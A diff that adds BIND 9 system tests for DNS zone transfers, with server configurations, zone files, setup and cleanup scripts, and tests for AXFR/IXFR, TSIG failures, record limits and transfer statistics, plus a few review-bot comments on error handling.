+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences primary;
+ check-integrity no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "primary" {
+ type primary;
+ file "primary.db";
+};
+
+zone "secondary" {
+ type secondary;
+ notify no;
+ primaries { 10.53.0.1; };
+ file "sec.bk";
+};
+
+zone "edns-expire" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "edns-expire.bk";
+};
+
+zone "axfr-too-big" {
+ type secondary;
+ max-records 30;
+ primaries { 10.53.0.1; };
+ file "axfr-too-big.bk";
+};
+
+zone "ixfr-too-big" {
+ type secondary;
+ max-records 30;
+ primaries { 10.53.0.1; };
+ file "ixfr-too-big.bk";
+};
diff --git a/bin/tests/system/xfer/ns7/named.conf.in b/bin/tests/system/xfer/ns7/named.conf.in
new file mode 100644
index 0000000..9bd92b3
--- /dev/null
+++ b/bin/tests/system/xfer/ns7/named.conf.in
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences secondary;
+ check-integrity no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "primary2" {
+ type primary;
+ file "primary2.db";
+};
+
+zone "secondary" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "sec.bk";
+};
+
+zone "edns-expire" {
+ type secondary;
+ primaries { 10.53.0.6; };
+ file "edns-expire.bk";
+};
diff --git a/bin/tests/system/xfer/ns8/example.db b/bin/tests/system/xfer/ns8/example.db
new file mode 100644
index 0000000..8e8ccb9
--- /dev/null
+++ b/bin/tests/system/xfer/ns8/example.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+$INCLUDE large.db
+$INCLUDE small.db
diff --git a/bin/tests/system/xfer/ns8/named.conf.in b/bin/tests/system/xfer/ns8/named.conf.in
new file mode 100644
index 0000000..22b3272
--- /dev/null
+++ b/bin/tests/system/xfer/ns8/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ transfer-message-size 1024;
+};
+
+key key1. {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+acl tzkey {
+ key key1.;
+};
+
+zone "example." {
+ type primary;
+ file "example.db";
+ allow-transfer { tzkey; };
+};
diff --git a/bin/tests/system/xfer/prereq.sh b/bin/tests/system/xfer/prereq.sh
new file mode 100644
index 0000000..b262501
--- /dev/null
+++ b/bin/tests/system/xfer/prereq.sh
@@ -0,0 +1,35 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+
+if ! $PERL -e 'use Digest::HMAC;' 2>/dev/null
+then
+ echo_i "This test requires the Digest::HMAC Perl module." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/xfer/setup.sh b/bin/tests/system/xfer/setup.sh
new file mode 100644
index 0000000..3180a7f
--- /dev/null
+++ b/bin/tests/system/xfer/setup.sh
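Review bot: The three `$PERL -e …` probes in prereq.sh discard stderr and never check that `PERL` is set. If conf.sh leaves it empty, the shell tries to run `-e` as a command, `2>/dev/null` hides that failure, and the script reports a missing Net::DNS library instead of a missing interpreter. The check still fails closed, but the message sends the user after the wrong dependency. A guard before the first probe, `test -n "$PERL" || { echo_i "This test requires Perl." >&2; exit 1; }`, would make the diagnosis accurate. conf.sh is not part of this view, so it may already guarantee a value.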
@@ -0,0 +1,44 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL ../genzone.sh 1 6 7 >ns1/sec.db
+$SHELL ../genzone.sh 1 6 7 >ns1/edns-expire.db
+$SHELL ../genzone.sh 2 3 >ns2/example.db
+$SHELL ../genzone.sh 2 3 >ns2/tsigzone.db
+$SHELL ../genzone.sh 6 3 >ns6/primary.db
+$SHELL ../genzone.sh 7 >ns7/primary2.db
+
+cp -f ns4/root.db.in ns4/root.db
+$PERL -e 'for ($i=0;$i<10000;$i++){ printf("x%u 0 in a 10.53.0.1\n", $i);}' >> ns4/root.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+
+copy_setports ns4/named.conf.base ns4/named.conf
+
+cp ns2/sec.db.in ns2/sec.db
+touch -t 200101010000 ns2/sec.db
+
+cp ns2/mapped.db.in ns2/mapped.db
+
+$PERL -e 'for ($i=0;$i<4096;$i++){ printf("name%u 259200 A 1.2.3.4\nname%u 259200 TXT \"Hello World %u\"\n", $i, $i, $i);}' > ns8/small.db
+$PERL -e 'printf("large IN TYPE45234 \\# 48000 "); for ($i=0;$i<16*3000;$i++) { printf("%02x", $i % 256); } printf("\n");' > ns8/large.db
+
+cp -f ns1/ixfr-too-big.db.in ns1/ixfr-too-big.db
diff --git a/bin/tests/system/xfer/tests.sh b/bin/tests/system/xfer/tests.sh
new file mode 100755
index 0000000..607d68a
--- /dev/null
+++ b/bin/tests/system/xfer/tests.sh
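Review bot: setup.sh checks no exit status. If a `$SHELL ../genzone.sh … >nsN/….db` call, a `$PERL -e …` generator or a `copy_setports` call fails, the redirect has already created an empty or partial file and the script carries on, so tests.sh would start the servers against broken fixtures and fail far from the cause. Unless conf.sh (not visible here) already enables it, I would put `set -e` directly after `. $SYSTEMTESTTOP/conf.sh`, or append `|| exit 1` to the generator lines. The `cp -f` and plain `cp` lines also differ without an apparent reason, and one form throughout would read more clearly.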
@@ -0,0 +1,547 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +n=$((n+1)) +echo_i "testing basic zone transfer functionality (from primary) ($n)" +tmp=0 +$DIG $DIGOPTS example. @10.53.0.2 axfr > dig.out.ns2.test$n || tmp=1 +grep "^;" dig.out.ns2.test$n | cat_i +digcomp dig1.good dig.out.ns2.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing basic zone transfer functionality (from secondary) ($n)" +tmp=0 +# +# Spin to allow the zone to transfer. +# +wait_for_xfer () { + $DIG $DIGOPTS example. @10.53.0.3 axfr > dig.out.ns3.test$n || return 1 + grep "^;" dig.out.ns3.test$n > /dev/null && return 1 + return 0 +} +retry_quiet 25 wait_for_xfer || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i +digcomp dig1.good dig.out.ns3.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing TSIG signed zone transfers ($n)" +tmp=0 +$DIG $DIGOPTS tsigzone. @10.53.0.2 axfr -y tsigzone.:1234abcd8765 > dig.out.ns2.test$n || tmp=1 +grep "^;" dig.out.ns2.test$n | cat_i + +# +# Spin to allow the zone to transfer. +# +wait_for_xfer_tsig () { + $DIG $DIGOPTS tsigzone. 
@10.53.0.3 axfr -y tsigzone.:1234abcd8765 > dig.out.ns3.test$n || return 1 + grep "^;" dig.out.ns3.test$n > /dev/null && return 1 + return 0 +} +retry_quiet 25 wait_for_xfer_tsig || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +echo_i "reload servers for in preparation for ixfr-from-differences tests" + +rndc_reload ns1 10.53.0.1 +rndc_reload ns2 10.53.0.2 +rndc_reload ns3 10.53.0.3 +rndc_reload ns6 10.53.0.6 +rndc_reload ns7 10.53.0.7 + +sleep 2 + +echo_i "updating primary zones for ixfr-from-differences tests" + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns1/sec.db + +rndc_reload ns1 10.53.0.1 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns2/example.db + +rndc_reload ns2 10.53.0.2 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns6/primary.db + +rndc_reload ns6 10.53.0.6 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns7/primary2.db + +rndc_reload ns7 10.53.0.7 + +sleep 3 + +n=$((n+1)) +echo_i "testing zone is dumped after successful transfer ($n)" +tmp=0 +$DIG $DIGOPTS +noall +answer +multi @10.53.0.2 \ + secondary. soa > dig.out.ns2.test$n || tmp=1 +grep "1397051952 ; serial" dig.out.ns2.test$n > /dev/null 2>&1 || tmp=1 +grep "1397051952 ; serial" ns2/sec.db > /dev/null 2>&1 || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences yes; ($n)" +tmp=0 + +echo_i "wait for reloads..." 
+wait_for_reloads() ( + $DIG $DIGOPTS @10.53.0.6 +noall +answer soa primary > dig.out.soa1.ns6.test$n + grep "1397051953" dig.out.soa1.ns6.test$n > /dev/null || return 1 + $DIG $DIGOPTS @10.53.0.1 +noall +answer soa secondary > dig.out.soa2.ns1.test$n + grep "1397051953" dig.out.soa2.ns1.test$n > /dev/null || return 1 + $DIG $DIGOPTS @10.53.0.2 +noall +answer soa example > dig.out.soa3.ns2.test$n + grep "1397051953" dig.out.soa3.ns2.test$n > /dev/null || return 1 + return 0 +) +retry_quiet 20 wait_for_reloads || tmp=1 + +echo_i "wait for transfers..." +wait_for_transfers() ( + a=0 b=0 c=0 d=0 + $DIG $DIGOPTS @10.53.0.3 +noall +answer soa example > dig.out.soa1.ns3.test$n + grep "1397051953" dig.out.soa1.ns3.test$n > /dev/null && a=1 + $DIG $DIGOPTS @10.53.0.3 +noall +answer soa primary > dig.out.soa2.ns3.test$n + grep "1397051953" dig.out.soa2.ns3.test$n > /dev/null && b=1 + $DIG $DIGOPTS @10.53.0.6 +noall +answer soa secondary > dig.out.soa3.ns6.test$n + grep "1397051953" dig.out.soa3.ns6.test$n > /dev/null && c=1 + [ $a -eq 1 -a $b -eq 1 -a $c -eq 1 ] && return 0 + + # re-notify if necessary + $RNDCCMD 10.53.0.6 notify primary 2>&1 | sed 's/^/ns6 /' | cat_i + $RNDCCMD 10.53.0.1 notify secondary 2>&1 | sed 's/^/ns1 /' | cat_i + $RNDCCMD 10.53.0.2 notify example 2>&1 | sed 's/^/ns2 /' | cat_i + return 1 +) +retry_quiet 20 wait_for_transfers || tmp=1 + +$DIG $DIGOPTS example. \ + @10.53.0.3 axfr > dig.out.ns3.test$n || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i + +digcomp dig2.good dig.out.ns3.test$n || tmp=1 + +# ns3 has a journal iff it received an IXFR. +test -f ns3/example.bk || tmp=1 +test -f ns3/example.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences primary; (primary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS primary. \ + @10.53.0.6 axfr > dig.out.ns6.test$n || tmp=1 +grep "^;" dig.out.ns6.test$n | cat_i + +$DIG $DIGOPTS primary. 
\ + @10.53.0.3 axfr > dig.out.ns3.test$n || tmp=1 +grep "^;" dig.out.ns3.test$n > /dev/null && cat_i dig.out.ns3.test$n + +digcomp dig.out.ns6.test$n dig.out.ns3.test$n || tmp=1 + +# ns3 has a journal iff it received an IXFR. +test -f ns3/primary.bk || tmp=1 +test -f ns3/primary.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences primary; (secondary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS secondary. \ + @10.53.0.6 axfr > dig.out.ns6.test$n || tmp=1 +grep "^;" dig.out.ns6.test$n | cat_i + +$DIG $DIGOPTS secondary. \ + @10.53.0.1 axfr > dig.out.ns1.test$n || tmp=1 +grep "^;" dig.out.ns1.test$n | cat_i + +digcomp dig.out.ns6.test$n dig.out.ns1.test$n || tmp=1 + +# ns6 has a journal iff it received an IXFR. +test -f ns6/sec.bk || tmp=1 +test -f ns6/sec.bk.jnl && tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences secondary; (secondary zone) ($n)" +tmp=0 + +# ns7 has a journal iff it generates an IXFR. +test -f ns7/primary2.db || tmp=1 +test -f ns7/primary2.db.jnl && tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences secondary; (secondary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS secondary. \ + @10.53.0.1 axfr > dig.out.ns1.test$n || tmp=1 +grep "^;" dig.out.ns1.test$n | cat_i + +$DIG $DIGOPTS secondary. \ + @10.53.0.7 axfr > dig.out.ns7.test$n || tmp=1 +grep "^;" dig.out.ns7.test$n | cat_i + +digcomp dig.out.ns7.test$n dig.out.ns1.test$n || tmp=1 + +# ns7 has a journal iff it generates an IXFR. +test -f ns7/sec.bk || tmp=1 +test -f ns7/sec.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "check that a multi-message uncompressable zone transfers ($n)" +$DIG axfr . 
-p ${PORT} @10.53.0.4 | grep SOA > axfr.out +if test `wc -l < axfr.out` != 2 +then + echo_i "failed" + status=$((status+1)) +fi + +# now we test transfers with assorted TSIG glitches +DIGCMD="$DIG $DIGOPTS @10.53.0.4" +SENDCMD="$PERL ../send.pl 10.53.0.5 $EXTRAPORT1" + +echo_i "testing that incorrectly signed transfers will fail..." +n=$((n+1)) +echo_i "initial correctly-signed transfer should succeed ($n)" + +$SENDCMD < ans5/goodaxfr + +# Initially, ns4 is not authoritative for anything. +# Now that ans is up and running with the right data, we make ns4 +# a secondary for nil. + +cat <<EOF >>ns4/named.conf +zone "nil" { + type secondary; + file "nil.db"; + primaries { 10.53.0.5 key tsig_key; }; +}; +EOF + +nextpart ns4/named.run >/dev/null + +rndc_reload ns4 10.53.0.4 + +wait_for_soa() ( + $DIGCMD nil. SOA > dig.out.ns4.test$n + grep SOA dig.out.ns4.test$n > /dev/null +) +retry_quiet 10 wait_for_soa + +nextpart ns4/named.run | grep "Transfer status: success" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'initial AXFR' >/dev/null || { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "unsigned transfer ($n)" + +$SENDCMD < ans5/unsigned + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: expected a TSIG or SIG(0)" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'unsigned AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "bad keydata ($n)" + +$SENDCMD < ans5/badkeydata + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: tsig verify failure" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. 
TXT | grep 'bad keydata AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "partially-signed transfer ($n)" + +$SENDCMD < ans5/partial + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: expected a TSIG or SIG(0)" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'partially signed AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "unknown key ($n)" + +$SENDCMD < ans5/unknownkey + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "tsig key 'tsig_key': key name and algorithm do not match" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'unknown key AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "incorrect key ($n)" + +$SENDCMD < ans5/wrongkey + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "tsig key 'tsig_key': key name and algorithm do not match" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'incorrect key AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "bad message id ($n)" + +$SENDCMD < ans5/badmessageid + +# Uncomment to see AXFR stream with mismatching IDs. +# $DIG $DIGOPTS @10.53.0.5 -y tsig_key:LSAnCU+Z nil. AXFR +all + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +msg="detected message ID mismatch on incoming AXFR stream, transfer will fail in BIND 9.17.2 and later if AXFR source is not fixed" +nextpart ns4/named.run | grep "$msg" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. 
TXT | grep 'bad message id' >/dev/null || { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "mismatched SOA ($n)" + +${SENDCMD} < ans5/soamismatch + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: FORMERR" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'SOA mismatch AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "check that we ask for and get a EDNS EXPIRE response ($n)" +# force a refresh query +$RNDCCMD 10.53.0.7 refresh edns-expire 2>&1 | sed 's/^/ns7 /' | cat_i +sleep 10 + +# there may be multiple log entries so get the last one. +expire=`awk '/edns-expire\/IN: got EDNS EXPIRE of/ { x=$9 } END { print x }' ns7/named.run` +test ${expire:-0} -gt 0 -a ${expire:-0} -lt 1814400 || { + echo_i "failed (expire=${expire:-0})" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "test smaller transfer TCP message size ($n)" +$DIG $DIGOPTS example. 
@10.53.0.8 axfr \ + -y key1.:1234abcd8765 > dig.out.msgsize.test$n || status=1 + +$DOS2UNIX dig.out.msgsize.test$n >/dev/null 2>&1 + +bytes=`wc -c < dig.out.msgsize.test$n` +if [ $bytes -ne 459357 ]; then + echo_i "failed axfr size check" + status=$((status+1)) +fi + +num_messages=`cat ns8/named.run | grep "sending TCP message of" | wc -l` +if [ $num_messages -le 300 ]; then + echo_i "failed transfer message count check" + status=$((status+1)) +fi + +n=$((n+1)) +echo_i "test mapped zone with out of zone data ($n)" +tmp=0 +$DIG -p ${PORT} txt mapped @10.53.0.3 > dig.out.1.test$n +grep "status: NOERROR," dig.out.1.test$n > /dev/null || tmp=1 +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 +check_mapped () { + $DIG -p ${PORT} txt mapped @10.53.0.3 > dig.out.2.test$n + grep "status: NOERROR," dig.out.2.test$n > /dev/null || return 1 + $DIG -p ${PORT} axfr mapped @10.53.0.3 > dig.out.3.test$n + digcomp knowngood.mapped dig.out.3.test$n || return 1 + return 0 +} +retry_quiet 10 check_mapped || tmp=1 +[ "$tmp" -ne 0 ] && echo_i "failed" +status=$((status+tmp)) + +n=$((n+1)) +echo_i "test that a zone with too many records is rejected (AXFR) ($n)" +tmp=0 +grep "'axfr-too-big/IN'.*: too many records" ns6/named.run >/dev/null || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "test that a zone with too many records is rejected (IXFR) ($n)" +tmp=0 +nextpart ns6/named.run > /dev/null +$NSUPDATE << EOF +zone ixfr-too-big +server 10.53.0.1 ${PORT} +update add the-31st-record.ixfr-too-big 0 TXT this is it +send +EOF +msg="'ixfr-too-big/IN' from 10.53.0.1#${PORT}: Transfer status: too many records" +wait_for_log 10 "$msg" ns6/named.run || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "checking whether dig calculates AXFR statistics correctly ($n)" +tmp=0 +# Loop until the secondary server manages to transfer the "xfer-stats" zone so +# that we can both check 
dig output and immediately proceed with the next test. +# Use -b so that we can discern between incoming and outgoing transfers in ns3 +# logs later on. +wait_for_xfer() ( + $DIG $DIGOPTS +noedns +stat -b 10.53.0.2 @10.53.0.3 xfer-stats. AXFR > dig.out.ns3.test$n + grep "; Transfer failed" dig.out.ns3.test$n > /dev/null || return 0 + return 1 +) +if retry_quiet 10 wait_for_xfer; then + get_dig_xfer_stats dig.out.ns3.test$n > stats.dig + diff axfr-stats.good stats.dig || tmp=1 +else + echo_i "timed out waiting for zone transfer" +fi +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +# Note: in the next two tests, we use ns3 logs for checking both incoming and +# outgoing transfer statistics as ns3 is both a secondary server (for ns1) and a +# primary server (for dig queries from the previous test) for "xfer-stats". +n=$((n+1)) +echo_i "checking whether named calculates incoming AXFR statistics correctly ($n)" +tmp=0 +get_named_xfer_stats ns3/named.run 10.53.0.1 xfer-stats "Transfer completed" > stats.incoming +diff axfr-stats.good stats.incoming || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "checking whether named calculates outgoing AXFR statistics correctly ($n)" +tmp=0 +check_xfer_stats() { + get_named_xfer_stats ns3/named.run 10.53.0.2 xfer-stats "AXFR ended" > stats.outgoing + diff axfr-stats.good stats.outgoing > /dev/null +} +retry_quiet 10 check_xfer_stats || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/xferquota/clean.sh b/bin/tests/system/xferquota/clean.sh new file mode 100644 index 0000000..9cc4057 --- /dev/null +++ b/bin/tests/system/xferquota/clean.sh 
@@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer quota tests. +# + +rm -f ns1/zone*.example.db ns1/zones.conf +rm -f ns2/zone*.example.bk ns2/zones.conf +rm -f dig.out.* ns2/changing.bk +rm -f ns1/changing.db +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/xferquota/ns1/changing1.db b/bin/tests/system/xferquota/ns1/changing1.db new file mode 100644 index 0000000..0b5e893 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/changing1.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 + +@ IN SOA dns1.changing. postmaster.changing. ( + 1 ;; serial + 3600 ;; refresh period + 1800 ;; retry interval + 604800 ;; expire time + 600 ) ;; default TTL + + IN NS dns1.changing. + NS dns2.changing. + +dns1 IN A 10.53.0.1 +dns2 IN A 10.53.0.2 + +a IN A 10.0.0.1 diff --git a/bin/tests/system/xferquota/ns1/changing2.db b/bin/tests/system/xferquota/ns1/changing2.db new file mode 100644 index 0000000..33dd7f4 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/changing2.db 
@@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 + +@ IN SOA dns1.changing. postmaster.changing. ( + 2 ;; serial + 3600 ;; refresh period + 1800 ;; retry interval + 604800 ;; expire time + 600 ) ;; default TTL + + IN NS dns1.changing. + NS dns2.changing. + +dns1 IN A 10.53.0.1 +dns2 IN A 10.53.0.2 + +a IN A 10.0.0.2 diff --git a/bin/tests/system/xferquota/ns1/named.conf.in b/bin/tests/system/xferquota/ns1/named.conf.in new file mode 100644 index 0000000..c9f19f9 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + 